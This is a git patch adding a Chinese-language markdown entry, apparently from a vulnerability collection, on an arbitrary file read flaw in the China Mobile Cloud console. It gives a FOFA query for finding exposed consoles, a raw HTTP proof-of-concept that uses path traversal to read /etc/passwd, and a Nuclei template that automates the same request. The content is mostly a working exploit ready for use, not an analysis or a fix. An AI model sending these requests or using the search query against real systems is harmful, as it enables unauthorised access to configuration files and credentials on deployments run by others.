From 64762d820f298db940805a40d72e40ffc3fa9f8a Mon Sep 17 00:00:00 2001
From: wy876 <TgsstfA@protonmail.com>
Date: Tue, 18 Jun 2024 15:38:12 +0800
Subject: [PATCH] =?UTF-8?q?6.18=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 中国移动云控制台存在任意文件读取.md | 50 +++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 中国移动云控制台存在任意文件读取.md

diff --git a/中国移动云控制台存在任意文件读取.md b/中国移动云控制台存在任意文件读取.md
new file mode 100644
index 0000000..f1e6d6c
--- /dev/null
+++ b/中国移动云控制台存在任意文件读取.md
@@ -0,0 +1,50 @@
+## 中国移动云控制台存在任意文件读取
+
+中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统，移动云控制台存在文件任意读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息
+
+## fofa
+
+```
+body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
+```
+
+## poc
+
+```
+GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
+Host: ip
+```
+
+![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)
+
+
+
+## Yaml
+
+```
+id: cmecloud-console-readfile
+
+info:
+  name: 移动云控制台存在任意文件读取
+  author: onewin
+  severity: high
+  description: 移动云控制台存在任意文件读取
+
+http:
+- raw:
+  - |+
+    @timeout: 30s
+    GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
+    Host: {{Hostname}}
+
+  matchers-condition: and
+  matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "root"
+        part: body
+```
+